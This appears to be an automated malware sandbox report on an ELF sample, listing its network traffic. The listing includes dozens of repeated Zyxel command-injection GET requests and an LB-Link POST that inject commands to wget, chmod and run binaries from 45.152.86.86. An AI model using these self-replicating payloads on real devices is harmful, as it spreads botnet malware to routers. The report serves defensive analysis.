      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: unknownDNS traffic detected: queries for: a.iruko.top
      Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 31 Mar 2024 13:41:59 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Found
      Source: b3CaTUFeSZ.elfString found in binary or memory: http://45.152.86.86/mips;$
      Source: b3CaTUFeSZ.elfString found in binary or memory: http://45.152.86.86/mpsl;
      Source: unknownNetwork traffic detected: HTTP traffic on port 39890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48366 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37226 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48378 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38552 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34190 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39420 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42602 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36358 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 38564 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 58144 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39502
      Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
      Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
      Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
      Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
      Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59482 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
      Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 46148 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52886 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51103 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 32812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
      Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 47462 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
      Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
      Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 39468 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
      Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40526
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40524
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
      Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40528
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
      Source: unknownNetwork traffic detected: HTTP traffic on port 47090 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40522
      Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40520
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
      Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52526
      Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52520
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39536
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
      Source: unknownNetwork traffic detected: HTTP traffic on port 58590 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
      Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40510
      Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52536
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
      Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
      Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39520
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
      Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
      Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
      Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39516
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40504
      Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
      Source: unknownNetwork traffic detected: HTTP traffic on port 53766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40502
      Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40508
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40506
      Source: unknownNetwork traffic detected: HTTP traffic on port 43988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41830
      Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
      Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50620 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
      Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52548
      Source: unknownNetwork traffic detected: HTTP traffic on port 39816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52542
      Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52540
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39512
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52546
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
      Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52544
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
      Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39504
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39506
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
      Source: unknownNetwork traffic detected: HTTP traffic on port 35466 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39508
      Source: unknownNetwork traffic detected: HTTP traffic on port 57288 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 36780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
      Source: unknownNetwork traffic detected: HTTP traffic on port 39456 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
      Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
      Source: unknownNetwork traffic detected: HTTP traffic on port 40854 -> 443
